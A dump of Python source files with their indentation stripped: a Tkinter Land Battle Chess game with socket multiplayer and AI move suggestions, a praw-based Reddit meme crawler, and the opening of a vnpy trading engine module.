if data.errorMsg == None:
msg = "playerSwitched %d %d %d %d\n" % (a, b, c, d)
print("sending: ", msg)
data.server.send(msg.encode())
else:
# undo selection
data.selectCount = 0
data.errorMsg = None
data.firstSelect = None
for x in range(12):
for y in range(5):
if data.board[x][y].selected:
data.board[x][y].selected = False
elif data.mode == "onePlayerLayout":
if 385 < event.x < 465 and 380 < event.y < 420:
# start game
data.selectCount = 0
data.firstSelect = None
for x in range(12):
for y in range(5):
if data.board[x][y].selected:
data.board[x][y].selected = False
data.mode = "onePlayerGame"
if getLocation(event.x, event.y) != None:
(i, j) = getLocation(event.x, event.y)
if type(data.board[i][j]) == Camp:
return None
data.selectCount += 1
data.board[i][j].select()
if data.selectCount == 1:
data.firstSelect = (i, j)
elif data.selectCount == 2:
data.secondSelect = (i, j)
data.errorMsg = switch(data)
else:
# undo selection
data.selectCount = 0
data.firstSelect = None
data.errorMsg = None
for x in range(12):
for y in range(5):
if data.board[x][y].selected:
data.board[x][y].selected = False
elif data.mode == "twoPlayerGame" and data.displaySuggestedMove == 0:
if getLocation(event.x, event.y) == None:
# clear selection
data.selectCount = 0
if data.firstSelect != None:
for (a, b) in isLegal(data.board, data.firstSelect):
data.board[a][b].highlight()
(i, j) = data.firstSelect
data.firstSelect = None
data.board[i][j].select()
else:
# a piece is selected
(i, j) = getLocation(event.x, event.y)
if data.myPID == "PlayerA":
(i, j) = (11-i, 4-j) # reverse the board
# selected a piece to move
if data.selectCount == 0 and data.board[i][j].piece != None and data.board[i][j].piece.side == data.turn:
# cannot move opponent's pieces
if (data.myPID == "PlayerA" and data.turn == "A") or (data.myPID == "PlayerB" and data.turn == "B"):
data.selectCount += 1
data.board[i][j].select()
data.firstSelect = (i, j)
for (a, b) in isLegal(data.board, data.firstSelect):
data.board[a][b].highlight()
# selected a spot to move to
elif data.selectCount == 1:
if (i, j) in isLegal(data.board, data.firstSelect):
(a, b) = data.firstSelect
msg = "playerMoved %d %d %d %d\n" % (a, b, i, j)
print("sending: ", msg)
data.server.send(msg.encode())
data.timer = 0
data.playerMove = (a, b, i, j)
for x in range(12):
for y in range(5):
if data.board[x][y].highlighted:
data.board[x][y].highlighted = False
if data.board[x][y].selected:
data.board[x][y].selected = False
elif data.mode == "onePlayerGame" and data.turn == "B":
if getLocation(event.x, event.y) == None:
#clear selection
data.selectCount = 0
if data.firstSelect != None:
for (a, b) in isLegal(data.board, data.firstSelect):
data.board[a][b].highlight()
(i, j) = data.firstSelect
data.firstSelect = None
data.board[i][j].select()
else:
# a piece is selected
(i, j) = getLocation(event.x, event.y)
# selected a piece to move
if data.selectCount == 0 and data.board[i][j].piece != None and data.board[i][j].piece.side == data.turn:
data.selectCount += 1
data.board[i][j].select()
data.firstSelect = (i, j)
for (a, b) in isLegal(data.board, data.firstSelect):
data.board[a][b].highlight()
# selected a spot to move to
elif data.selectCount == 1:
if (i, j) in isLegal(data.board, data.firstSelect):
(a, b) = data.firstSelect
if data.board[i][j].piece == None:
data.board[i][j].piece = data.board[a][b].piece
data.board[a][b].piece = None
else:
# two pieces contact
contactWithGameOverCheck(a, b, i, j, data)
data.firstSelect = None
data.selectCount = 0
data.countdown = 20
data.turn = "A"
for x in range(12):
for y in range(5):
if data.board[x][y].highlighted:
data.board[x][y].highlighted = False
if data.board[x][y].selected:
data.board[x][y].selected = False
def keyPressed(event, data):
# enter help mode
if event.char == "h" and data.mode != "help" and data.mode != "help2":
data.lastMode = data.mode
data.mode = "help"
# return to game
elif event.char == "r":
data.mode = data.lastMode
# next page in help mode
elif event.char == "n" and data.mode == "help":
data.mode = "help2"
# restart game
elif event.char == "s":
myPID = data.myPID
otherPlayerOnline = data.otherPlayerOnline
init(data)
data.myPID = myPID
data.otherPlayerOnline = otherPlayerOnline
# getting AI-suggested move
elif data.mode == "twoPlayerGame" and event.char == "a" and data.displaySuggestedMove == 0 and not data.darkMode:
for x in range(12):
for y in range(5):
if data.board[x][y].highlighted:
data.board[x][y].highlighted = False
if data.board[x][y].selected:
data.board[x][y].selected = False
# get suggested A move
if data.myPID == "PlayerA":
board = copy.deepcopy(data.board)
((a, b, i, j), bestScore) = AIMove(board, 4) # maxDepth = 4
data.move = (a, b, i, j)
data.board[a][b].select()
data.board[i][j].highlight()
data.displaySuggestedMove = 1
# get suggested B move
elif data.myPID == "PlayerB":
board = copy.deepcopy(data.board)
((a, b, i, j), bestScore) = PlayerMove(board, 4) # maxDepth = 4
data.move = (a, b, i, j)
data.board[a][b].select()
data.board[i][j].highlight()
data.displaySuggestedMove = 1
def getServerMsg(data):
while serverMsg.qsize() > 0:
if data.winner != None:
break
msg = serverMsg.get(False)
try:
print("received: ", msg, "\n")
msg = msg.split()
command = msg[0]
if command == "myIDis":
myPID = msg[1]
data.myPID = myPID
elif command == "newPlayer":
data.otherPlayerOnline = True
elif data.mode == "twoPlayerLayout" and command == "playerSwitched":
PID = msg[1]
a = int(msg[2])
b = int(msg[3])
c = int(msg[4])
d = int(msg[5])
data.board[a][b].piece, data.board[c][d].piece = data.board[c][d].piece, data.board[a][b].piece
elif data.mode == "twoPlayerGame" and command == "playerMoved":
PID = msg[1]
a = int(msg[2])
b = int(msg[3])
i = int(msg[4])
j = int(msg[5])
data.playerMove = (a, b, i, j)
data.timer = 0
elif command == "playerReady":
data.otherPlayerReady = True
print("received ready")
except:
print("failed")
serverMsg.task_done()
def timerFired(data):
getServerMsg(data)
if data.selfPlayerReady and data.otherPlayerReady and data.mode == "twoPlayerLayout":
data.mode = "twoPlayerGame"
elif data.mode == "twoPlayerGame":
# displaying AI-suggested move
if data.displaySuggestedMove > 0:
data.displaySuggestedMove += 1
if data.displaySuggestedMove == 4:
data.displaySuggestedMove = 0
# undo suggestion
(a, b, i, j) = data.move
data.board[a][b].select()
data.board[i][j].highlight()
data.move = None
# display move
if data.timer == 0:
data.timer += 1
(a, b, i, j) = data.playerMove
data.board[a][b].select()
elif data.timer == 1:
data.timer += 1
(a, b, i, j) = data.playerMove
data.board[i][j].highlight()
# make move
elif data.timer == 2:
data.timer = None
(a, b, i, j) = data.playerMove
if data.board[i][j].piece == None:
data.board[i][j].piece = data.board[a][b].piece
data.board[a][b].piece = None
else: # two pieces contact
contactWithGameOverCheck(a, b, i, j, data)
data.firstSelect = None
data.selectCount = 0
data.countdown = 20
if data.turn == "B":
data.turn = "A"
else:
data.turn = "B"
marA = marB = False
for x in range(12):
for y in range(5):
if data.board[x][y].highlighted:
data.board[x][y].highlighted = False
if data.board[x][y].selected:
data.board[x][y].selected = False
if data.board[x][y].piece != None and data.board[x][y].piece.order == 9:
if data.board[x][y].piece.side == "A":
marA = True
else:
marB = True
data.marA, data.marB = marA, marB
# not making or displaying move
else:
data.countdown -= 1
if data.countdown <= 0:
data.countdown = 20
data.firstSelect = None
data.selectCount = 0
if data.turn == "B":
data.turn = "A"
else:
data.turn = "B"
for x in range(12):
for y in range(5):
try:
if data.board[x][y].highlighted:
data.board[x][y].highlighted = False
if data.board[x][y].selected:
data.board[x][y].selected = False
except:
pass
elif data.mode == "onePlayerGame":
data.countdown -= 1
if data.countdown <= 0:
data.countdown = 20
data.firstSelect = None
data.selectCount = 0
if data.turn == "B":
data.turn = "A"
else:
data.turn = "B"
for x in range(12):
for y in range(5):
try:
if data.board[x][y].highlighted:
data.board[x][y].highlighted = False
if data.board[x][y].selected:
data.board[x][y].selected = False
except:
pass
# get AI move
if data.turn == "A" and data.countdown == 19 and data.winner == None:
board = copy.deepcopy(data.board)
((a, b, i, j), bestScore) = AIMove(board, data.maxDepth)
data.move = (a, b, i, j)
data.board[a][b].select()
# display AI move
elif data.turn == "A" and data.countdown == 18 and data.winner == None and data.move != None:
(a, b, i, j) = data.move
data.board[i][j].highlight()
elif data.turn == "A" and data.countdown == 17 and data.winner == None and data.move != None:
(a, b, i, j) = data.move
# undo highlight and selection
data.board[a][b].select()
data.board[i][j].highlight()
data.move = None
# make move
if data.board[i][j].piece == None:
data.board[i][j].piece = data.board[a][b].piece
data.board[a][b].piece = None
else: # two pieces contact
contactWithGameOverCheck(a, b, i, j, data)
data.turn = "B"
data.countdown = 20
def redrawAll(canvas, data):
canvas.create_image(data.width/2, data.height/2, image=data.background)
if data.mode == "start":
drawStartPage(canvas, data)
elif data.mode == "selectDifficulty":
canvas.create_text(300, 180, text="Select Difficulty", font="Copperplate 50")
#canvas.create_rectangle(200, 340, 400, 400, width=3)
canvas.create_line(210, 340, 390, 340, width=3)
canvas.create_line(210, 400, 390, 400, width=3)
canvas.create_line(200, 350, 200, 390, width=3)
canvas.create_line(400, 350, 400, 390, width=3)
canvas.create_arc(200, 340, 220, 360, start=90, extent=90, width=3, style="arc")
canvas.create_arc(380, 340, 400, 360, start=0, extent=90, width=3, style="arc")
canvas.create_arc(200, 380, 220, 400, start=180, extent=90, width=3, style="arc")
canvas.create_arc(380, 380, 400, 400, start=270, extent=90, width=3, style="arc")
canvas.create_text(300, 370, text="Easy", font="Arial 23")
#canvas.create_rectangle(200, 420, 400, 480, width=3)
canvas.create_line(210, 420, 390, 420, width=3)
canvas.create_line(210, 480, 390, 480, width=3)
canvas.create_line(200, 430, 200, 470, width=3)
canvas.create_line(400, 430, 400, 470, width=3)
canvas.create_arc(200, 420, 220, 440, start=90, extent=90, width=3, style="arc")
canvas.create_arc(380, 420, 400, 440, start=0, extent=90, width=3, style="arc")
canvas.create_arc(200, 460, 220, 480, start=180, extent=90, width=3, style="arc")
canvas.create_arc(380, 460, 400, 480, start=270, extent=90, width=3, style="arc")
canvas.create_text(300, 450, text="Hard", font="Arial 23")
elif data.mode == "help":
drawHelpPage(canvas, data)
elif data.mode == "help2":
drawHelp2Page(canvas, data)
elif data.mode == "twoPlayerLayout":
drawBoardSkeleton(canvas, data)
# drawing posts
if data.myPID == "PlayerA":
for x in range(len(data.board)):
for y in range(len(data.board[0])):
if x < 6:
data.board[x][y].reversedDraw(canvas)
else:
# hiding opponent's layout
data.board[x][y].reversedDrawDark(canvas)
else:
for x in range(len(data.board)):
for y in range(len(data.board[0])):
if x >= 6:
data.board[x][y].draw(canvas)
else:
# hiding opponent's layout
data.board[x][y].drawDark(canvas)
canvas.create_text(175, 420, text="Press \"H\" for help", font="Arial 15")
if data.otherPlayerOnline:
canvas.create_text(175, 380, text="To rearrange layout,", font="Arial 15")
canvas.create_text(175, 400, text="select pieces to switch", font="Arial 15")
if not data.selfPlayerReady:
#canvas.create_rectangle(385, 380, 465, 420, width=2)
canvas.create_line(390, 380, 460, 380, width=2)
canvas.create_line(390, 420, 460, 420, width=2)
canvas.create_line(385, 385, 385, 415, width=2)
canvas.create_line(465, 385, 465, 415, width=2)
canvas.create_arc(385, 380, 395, 390, start=90, extent=90, style="arc", width=2)
canvas.create_arc(455, 380, 465, 390, start=0, extent=90, style="arc", width=2)
canvas.create_arc(385, 410, 395, 420, start=180, extent=90, style="arc", width=2)
canvas.create_arc(455, 410, 465, 420, start=270, extent=90, style="arc", width=2)
canvas.create_text(425, 400, text="READY", font="Arial 20")
else:
canvas.create_text(425, 390, text="Waiting for the other", font="Arial 15")
canvas.create_text(425, 410, text="player to complete layout...", font="Arial 15")
else:
canvas.create_text(425, 390, text="Waiting for the other", font="Arial 15")
canvas.create_text(425, 410, text="player to get online...", font="Arial 15")
if data.errorMsg != None:
canvas.create_rectangle(0, 370, 600, 430, fill="red3")
canvas.create_text(300, 400, text=data.errorMsg, font="Arial 20")
elif data.mode == "onePlayerLayout":
drawBoardSkeleton(canvas, data)
for x in range(len(data.board)):
for y in range(len(data.board[0])):
if x < 6:
# hiding AI's layout
data.board[x][y].drawDark(canvas)
else:
data.board[x][y].draw(canvas)
canvas.create_text(175, 380, text="To rearrange layout,", font="Arial 15")
canvas.create_text(175, 400, text="select pieces to switch", font="Arial 15")
canvas.create_text(175, 420, text="Press \"H\" for help", font="Arial 15")
#canvas.create_rectangle(385, 380, 465, 420, width=2)
canvas.create_line(390, 380, 460, 380, width=2)
canvas.create_line(390, 420, 460, 420, width=2)
canvas.create_line(385, 385, 385, 415, width=2)
canvas.create_line(465, 385, 465, 415, width=2)
canvas.create_arc(385, 380, 395, 390, start=90, extent=90, style="arc", width=2)
canvas.create_arc(455, 380, 465, 390, start=0, extent=90, style="arc", width=2)
canvas.create_arc(385, 410, 395, 420, start=180, extent=90, style="arc", width=2)
canvas.create_arc(455, 410, 465, 420, start=270, extent=90, style="arc", width=2)
canvas.create_text(425, 400, text="START", font="Arial 20")
if data.errorMsg != None:
canvas.create_rectangle(0, 370, 600, 430, fill="red3")
canvas.create_text(300, 400, text=data.errorMsg, font="Arial 20")
elif data.mode == "twoPlayerGame":
drawBoardSkeleton(canvas, data)
# drawing posts
if data.myPID == "PlayerA":
for x in range(len(data.board)):
for y in range(len(data.board[0])):
if data.darkMode:
# hide opponent's pieces
if data.board[x][y].piece != None and data.board[x][y].piece.side == "B":
# flag is revealed when Marshall is dead
if data.board[x][y].piece.order == 0 and not data.marB:
data.board[x][y].reversedDraw(canvas)
else:
data.board[x][y].reversedDrawDark(canvas)
else:
data.board[x][y].reversedDraw(canvas)
else:
data.board[x][y].reversedDraw(canvas)
else:
for x in range(len(data.board)):
for y in range(len(data.board[0])):
if data.darkMode:
# hide opponent's pieces
if data.board[x][y].piece != None and data.board[x][y].piece.side == "A":
# flag is revealed when Marshall is dead
if data.board[x][y].piece.order == 0 and not data.marA:
data.board[x][y].draw(canvas)
else:
data.board[x][y].drawDark(canvas)
else:
data.board[x][y].draw(canvas)
else:
data.board[x][y].draw(canvas)
if data.darkMode:
canvas.create_text(175, 390, text="Press \"H\" for help", font="Arial 15")
canvas.create_text(175, 410, text="Press \"S\" to restart game", font="Arial 15")
else:
canvas.create_text(175, 380, text="Press \"A\" for AI-suggested move", font="Arial 15")
canvas.create_text(175, 400, text="Press \"H\" for help", font="Arial 15")
canvas.create_text(175, 420, text="Press \"S\" to restart game", font="Arial 15")
if data.timer != None:
# display move
canvas.create_text(425, 390, text="Making move...", font="Arial 15")
elif data.turn == "B":
canvas.create_text(425, 390, text="Blue Player's Turn", font="Arial 15")
canvas.create_text(425, 410, text="Time remaining: "+str(data.countdown), font="Arial 15")
else:
canvas.create_text(425, 390, text="Orange Player's Turn", font="Arial 15")
canvas.create_text(425, 410, text="Time remaining: "+str(data.countdown), font="Arial 15")
if data.winner != None:
# displaying game-over message
canvas.create_rectangle(0, 370, 600, 430, fill="red3")
if (data.winner == "A" and data.myPID == "PlayerA") or (data.winner == "B" and data.myPID == "PlayerB"):
canvas.create_text(300, 400, text="You win! Press \"S\" to restart", font="Arial 28")
else:
canvas.create_text(300, 400, text="You lose! Press \"S\" to restart", font="Arial 28")
elif data.mode == "onePlayerGame":
drawBoard(canvas, data)
canvas.create_text(175, 390, text="Press \"H\" for help", font="Arial 15")
canvas.create_text(175, 410, text="Press \"S\" to restart game", font="Arial 15")
if data.turn == "B":
canvas.create_text(425, 390, text="Your Turn", font="Arial 15")
canvas.create_text(425, 410, text="Time remaining: "+str(data.countdown), font="Arial 15")
else:
canvas.create_text(425, 390, text="AI Player's Turn", font="Arial 15")
if data.winner != None:
# display game-over message
canvas.create_rectangle(0, 370, 600, 430, fill="red3")
if data.winner == "A":
canvas.create_text(300, 400, text="You lose! Press \"S\" to restart", font="Arial 28")
else:
canvas.create_text(300, 400, text="You win! Press \"S\" to restart", font="Arial 28")
def drawStartPage(canvas, data):
canvas.create_text(300, 180, text="Land Battle Chess", font="Copperplate 50")
canvas.create_text(300, 240, text="Carnegie Mellon University", font="Arial 18")
canvas.create_text(300, 270, text="15-112 Term Project", font="Arial 18")
canvas.create_text(300, 300, text="by Yiwen (Victor) Song", font="Arial 18")
#canvas.create_rectangle(200, 340, 400, 400, width=3)
canvas.create_line(210, 340, 390, 340, width=3)
canvas.create_line(210, 400, 390, 400, width=3)
canvas.create_line(200, 350, 200, 390, width=3)
canvas.create_line(400, 350, 400, 390, width=3)
canvas.create_arc(200, 340, 220, 360, start=90, extent=90, width=3, style="arc")
canvas.create_arc(380, 340, 400, 360, start=0, extent=90, width=3, style="arc")
canvas.create_arc(200, 380, 220, 400, start=180, extent=90, width=3, style="arc")
canvas.create_arc(380, 380, 400, 400, start=270, extent=90, width=3, style="arc")
canvas.create_text(300, 370, text="Play singleplayer", font="Arial 23")
#canvas.create_rectangle(200, 420, 400, 480, width=3)
canvas.create_line(210, 420, 390, 420, width=3)
canvas.create_line(210, 480, 390, 480, width=3)
canvas.create_line(200, 430, 200, 470, width=3)
canvas.create_line(400, 430, 400, 470, width=3)
canvas.create_arc(200, 420, 220, 440, start=90, extent=90, width=3, style="arc")
canvas.create_arc(380, 420, 400, 440, start=0, extent=90, width=3, style="arc")
canvas.create_arc(200, 460, 220, 480, start=180, extent=90, width=3, style="arc")
canvas.create_arc(380, 460, 400, 480, start=270, extent=90, width=3, style="arc")
canvas.create_text(300, 450, text="Play multiplayer", font="Arial 23")
#canvas.create_rectangle(200, 500, 400, 580, width=3)
canvas.create_line(210, 500, 390, 500, width=3)
canvas.create_line(210, 580, 390, 580, width=3)
canvas.create_line(200, 510, 200, 570, width=3)
canvas.create_line(400, 510, 400, 570, width=3)
canvas.create_arc(200, 500, 220, 520, start=90, extent=90, width=3, style="arc")
canvas.create_arc(380, 500, 400, 520, start=0, extent=90, width=3, style="arc")
canvas.create_arc(200, 560, 220, 580, start=180, extent=90, width=3, style="arc")
canvas.create_arc(380, 560, 400, 580, start=270, extent=90, width=3, style="arc")
canvas.create_text(300, 525, text="Play multiplayer", font="Arial 23")
canvas.create_text(300, 555, text="(Dark Mode)", font="Arial 23")
canvas.create_text(300, 640, text="Press \"H\" for game instructions", font="Arial 23")
def drawHelpPage(canvas, data):
canvas.create_text(300, 60, text="Help Manual", font="Copperplate 35")
canvas.create_text(50, 100, text="Welcome to the Land Battle Chess game! The following introduction", anchor="w", font="Arial 15")
canvas.create_text(50, 120, text="is partly derived from https://en.wikipedia.org/wiki/Luzhanqi", anchor="w", font="Arial 15")
canvas.create_text(50, 150, text="The aim of the game is to capture the opponent flag through penetrating", anchor="w", font="Arial 15")
canvas.create_text(50, 170, text="the defenses. Each player arranges the layout of their pieces prior to the game.", anchor="w", font="Arial 15")
canvas.create_text(50, 200, text="There are 3 kinds of stations: Posts, Camps, and Headquarters.", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 220, 100, 244, fill="PaleGreen3")
canvas.create_text(120, 232, text="Post: a piece can move on or off and can be attacked on a post", anchor="w", font="Arial 15")
canvas.create_oval(50, 260, 100, 300, fill="PaleGreen3")
canvas.create_text(120, 280, text="Camp: a piece in a camp cannot be attacked", anchor="w", font="Arial 15")
canvas.create_oval(75-25/2, 342-24, 75+25/2, 342, fill="black")
canvas.create_oval(75-25/2, 342, 75+25/2, 342+24, fill="black")
canvas.create_rectangle(50, 330, 100, 354, fill="PaleGreen3")
canvas.create_text(120, 332, text="Headquarter: pieces may only move in but not out of a headquarter", anchor="w", font="Arial 15")
canvas.create_text(120, 352, text="The Flag must be placed on one of the two headquarters of each side", anchor="w", font="Arial 15")
canvas.create_text(50, 400, text="Posts/Camps/Headquarters are connected by either a Road or a Railroad.", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 430, 100, 454, fill="PaleGreen3")
canvas.create_rectangle(50, 490, 100, 514, fill="PaleGreen3")
canvas.create_line(75, 454, 75, 490)
canvas.create_text(120, 462, text="Road: marked as thin lines on the board", anchor="w", font="Arial 15")
canvas.create_text(120, 482, text="A piece can only travel one space across a road in one move", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 530, 100, 554, fill="PaleGreen3")
canvas.create_rectangle(50, 590, 100, 614, fill="PaleGreen3")
canvas.create_line(75, 554, 75, 590, width=3)
canvas.create_text(120, 552, text="Railroad: marked as thick lines on the board", anchor="w", font="Arial 15")
canvas.create_text(120, 572, text="A piece can travel multiple spaces along a railroad in a straight line", anchor="w", font="Arial 15")
canvas.create_text(120, 592, text="as long as its path is not obstructed by another piece", anchor="w", font="Arial 15")
canvas.create_text(50, 660, text="Press \"N\" to see next page about the different pieces.", anchor="w", font="Arial 15")
canvas.create_text(50, 690, text="Press \"R\" to return to game", anchor="w", font="Arial 15")
def drawHelp2Page(canvas, data):
canvas.create_text(300, 60, text="Help Manual (cont'd)", font="Copperplate 35")
canvas.create_rectangle(50, 90, 100, 114, fill="deep sky blue")
canvas.create_text(75, 102, text="Mar10")
canvas.create_text(120, 102, text="Marshal * 1: order 10, highest order piece. In Dark Mode,", anchor="w", font="Arial 15")
canvas.create_text(205, 122, text="the flag is revealed when the Marshall is dead", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 140, 100, 164, fill="deep sky blue")
canvas.create_text(75, 152, text="Gen9")
canvas.create_text(120, 152, text="General * 2: order 9", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 180, 100, 204, fill="deep sky blue")
canvas.create_text(75, 192, text="MGen8")
canvas.create_text(120, 192, text="Major General * 2: order 8", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 220, 100, 244, fill="deep sky blue")
canvas.create_text(75, 232, text="BGen7")
canvas.create_text(120, 232, text="Brigadier General * 2: order 7", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 260, 100, 284, fill="deep sky blue")
canvas.create_text(75, 272, text="Col6")
canvas.create_text(120, 272, text="Colonel * 2: order 6", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 300, 100, 324, fill="deep sky blue")
canvas.create_text(75, 312, text="Maj5")
canvas.create_text(120, 312, text="Major * 2: order 5", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 340, 100, 364, fill="deep sky blue")
canvas.create_text(75, 352, text="Capt4")
canvas.create_text(120, 352, text="Captain * 3: order 4", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 380, 100, 404, fill="deep sky blue")
canvas.create_text(75, 392, text="Lt3")
canvas.create_text(120, 392, text="Lieutenant * 3: order 3", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 420, 100, 444, fill="deep sky blue")
canvas.create_text(75, 432, text="Spr2")
canvas.create_text(120, 432, text="Sapper * 3: order 2, can turn corners when travelling along Railroad", anchor="w", font="Arial 15")
canvas.create_text(200, 450, text="and can capture landmines", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 470, 100, 494, fill="deep sky blue")
canvas.create_text(75, 482, text="Bomb")
canvas.create_text(120, 482, text="Bomb * 2: when a bomb comes in contact with an enemy piece,", anchor="w", font="Arial 15")
canvas.create_text(190, 500, text="both pieces are removed from the board; ", anchor="w", font="Arial 15")
canvas.create_text(190, 518, text="bombs cannot initially be placed on the first rank", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 540, 100, 564, fill="deep sky blue")
canvas.create_text(75, 552, text="LMN")
canvas.create_text(120, 552, text="Landmine * 3: immune to any attack except when captured by a", anchor="w", font="Arial 15")
canvas.create_text(210, 570, text="Sapper or co-destroyed by a bomb; landmines can", anchor="w", font="Arial 15")
canvas.create_text(210, 588, text="only be placed on the last two ranks and cannot move", anchor="w", font="Arial 15")
canvas.create_rectangle(50, 610, 100, 634, fill="deep sky blue")
canvas.create_text(75, 622, text="Flag1")
canvas.create_text(120, 622, text="Flag * 1: can be captured by any enemy piece, which ends the game;", anchor="w", font="Arial 15")
canvas.create_text(180, 640, text="the Flag must be placed at a headquarter and cannot move", anchor="w", font="Arial 15")
canvas.create_text(50, 690, text="Press \"R\" to return to game", anchor="w", font="Arial 15")
def drawBoard(canvas, data):
drawBoardSkeleton(canvas, data)
# drawing posts
for x in range(len(data.board)):
for y in range(len(data.board[0])):
data.board[x][y].draw(canvas)
def drawBoardSkeleton(canvas, data):
# margin = 50
# drawing railroads
canvas.create_line(50, 110, 50, 690, width=3)
canvas.create_line(50, 110, 550, 110, width=3)
canvas.create_line(50, 690, 550, 690, width=3)
canvas.create_line(550, 110, 550, 690, width=3)
canvas.create_line(50, 350, 550, 350, width=3)
canvas.create_line(50, 450, 550, 450, width=3)
canvas.create_line(300, 350, 300, 450, width=3)
# drawing roads
for i in range(50, 400, 60):
canvas.create_line(50, i, 550, i)
for i in range(750, 500, -60):
canvas.create_line(50, i, 550, i)
for i in range(50, 600, 250):
canvas.create_line(i, 50, i, 750)
canvas.create_line(175, 50, 175, 350)
canvas.create_line(425, 50, 425, 350)
canvas.create_line(175, 450, 175, 750)
canvas.create_line(425, 450, 425, 750)
canvas.create_line(50, 110, 550, 350)
canvas.create_line(300, 110, 550, 230)
canvas.create_line(50, 230, 300, 350)
canvas.create_line(50, 350, 550, 110)
canvas.create_line(50, 230, 300, 110)
canvas.create_line(300, 350, 550, 230)
canvas.create_line(50, 450, 550, 690)
canvas.create_line(300, 450, 550, 570)
canvas.create_line(50, 570, 300, 690)
canvas.create_line(50, 570, 300, 450)
canvas.create_line(50, 690, 550, 450)
canvas.create_line(300, 690, 550, 570)
#################################################################
# the run function is derived from
# https://www.cs.cmu.edu/~112/notes/notes-animations-part2.html#starter-code
# with modifications for Socket module
def run(width, height, serverMsg=None, server=None):
def redrawAllWrapper(canvas, data):
canvas.delete(ALL)
canvas.create_rectangle(0, 0, data.width, data.height,
fill='white', width=0)
redrawAll(canvas, data)
canvas.update()
def mousePressedWrapper(event, canvas, data):
mousePressed(event, data)
redrawAllWrapper(canvas, data)
def keyPressedWrapper(event, canvas, data):
keyPressed(event, data)
redrawAllWrapper(canvas, data)
def timerFiredWrapper(canvas, data):
timerFired(data)
redrawAllWrapper(canvas, data)
# pause, then call timerFired again
canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)
# Set up data and call init
class Struct(object): pass
data = Struct()
data.server = server
data.serverMsg = serverMsg
data.width = width
data.height = height
data.timerDelay = 1000 # milliseconds
root = Tk()
init(data)
# create the root and the canvas
canvas = Canvas(root, width=data.width, height=data.height)
canvas.configure(bd=0, highlightthickness=0)
canvas.pack()
# set up events
root.bind("<Button-1>", lambda event:
mousePressedWrapper(event, canvas, data))
root.bind("<Key>", lambda event:
keyPressedWrapper(event, canvas, data))
timerFiredWrapper(canvas, data)
# and launch the app
root.mainloop() # blocks until window is closed
print("bye!")
serverMsg = Queue(100)
threading.Thread(target = handleServerMsg, args = (server, serverMsg)).start()
run(600, 800, serverMsg, server)
|
reddit.py
|
import time
import praw
import threading
import settings
from crawlers.generic import BaseCrawler
reddit_praw = praw.Reddit(client_id=settings.REDDIT_CLIENT_ID, client_secret=settings.REDDIT_CLIENT_SECRET,
password=settings.REDDIT_PASSWORD,
user_agent='memeID-C7', username=settings.REDDIT_USERNAME)
PAGE_SIZE = 100
def r_get_feed_new(sr, params):
return sr.new(limit=PAGE_SIZE, params=params)
def r_get_submission_comments(url):
return reddit_praw.submission(url=url).comments
class RedditCrawler(BaseCrawler):
sub_reddits = []
def __init__(self, sub_reddits, *args, **kwargs):
super(RedditCrawler, self).__init__(source='reddit', *args, **kwargs)
self.url = 'https://reddit.com'
self.sub_reddits = sub_reddits
def get_feed(self, sub_reddit, params, page_size=PAGE_SIZE):
return sub_reddit.new(limit=page_size, params=params)
def get_subscribers(self, sub_reddit):
return sub_reddit.subscribers
def _pre_process_data(self, subreddit, data):
results = []
last = None
for d in data:
if d.created_utc >= settings.BEGIN_CRAWL_SINCE:
results.append(
{
"id": d.id,
"upvote_count": d.ups,
"score": d.score,
"comment_count": d.num_comments,
"image_url": d.url,
"file_name": 'data/reddit/{}.jpg'.format(d.id),
"source": self.source,
"url": d.shortlink,
"created_at": d.created_utc,
"child_source": "r/{}".format(d.subreddit.display_name).lower(),
"subreddit_id": d.subreddit_id,
"title": d.title,
"is_video": d.is_video
}
)
last = d
return results, last
def _fetch_subscribers(self):
for sub_reddit in self.sub_reddits:
sr = reddit_praw.subreddit(sub_reddit)
try:
s_name = sub_reddit
if not sub_reddit.startswith('r/'):
s_name = 'r/' + sub_reddit
self.mongo_database.update_source_followers(s_name, self.get_subscribers(sr))
except:
self._log_console("Failed to fetch subscribers...")
def run(self):
self._log_console("Starting up {} crawler ...".format(self.source))
self._create_mongo_db_connection()
params = {}
threading.Thread(target=self._fetch_subscribers).start()
while self.running:
try:
for sub_reddit in self.sub_reddits:
params = {}
sr = reddit_praw.subreddit(sub_reddit)
data = self.get_feed(sr, params)
pre_processed_data, last = self._pre_process_data(data=data, subreddit=sub_reddit)
if last is not None:
params.update({"after": last.name})
if 'count' not in params:
params['count'] = 0
params['count'] += 100
else:
if 'count' not in params:
params['count'] = 0
params['count'] += 100
inserted, oldest_timestamp = self.process_data(pre_processed_data)
time.sleep(8)
self._log_console("Iteration ended ...")
except Exception as e:
print(e)
self._log_console("Exception on main thread run()")
|
engine.py
|
"""
"""
import logging
from logging import Logger
import smtplib
import os
from abc import ABC
from datetime import datetime
from email.message import EmailMessage
from queue import Empty, Queue
from threading import Thread
from typing import Any, Sequence, Type, Dict, List, Optional
from vnpy.event import Event, EventEngine
from .app import BaseApp
from .event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION,
EVENT_ACCOUNT,
EVENT_CONTRACT,
EVENT_LOG
)
from .gateway import BaseGateway
from .object import (
CancelRequest,
LogData,
OrderRequest,
SubscribeRequest,
HistoryRequest,
AccountTradeRequest,
OrderData,
BarData,
TickData,
TradeData,
PositionData,
AccountData,
ContractData,
Exchange,
BalanceRequest
)
from .setting import SETTINGS
from .utility import get_folder_path, TRADER_DIR
class MainEngine:
"""
Acts as the core of VN Trader.
"""
def __init__(self, event_engine: EventEngine = None):
""""""
if event_engine:
self.event_engine: EventEngine = event_engine
else:
self.event_engine = EventEngine()
self.event_engine.start()
self.gateways: Dict[str, BaseGateway] = {}
self.engines: Dict[str, BaseEngine] = {}
self.apps: Dict[str, BaseApp] = {}
self.exchanges: List[Exchange] = []
os.chdir(TRADER_DIR) # Change working directory
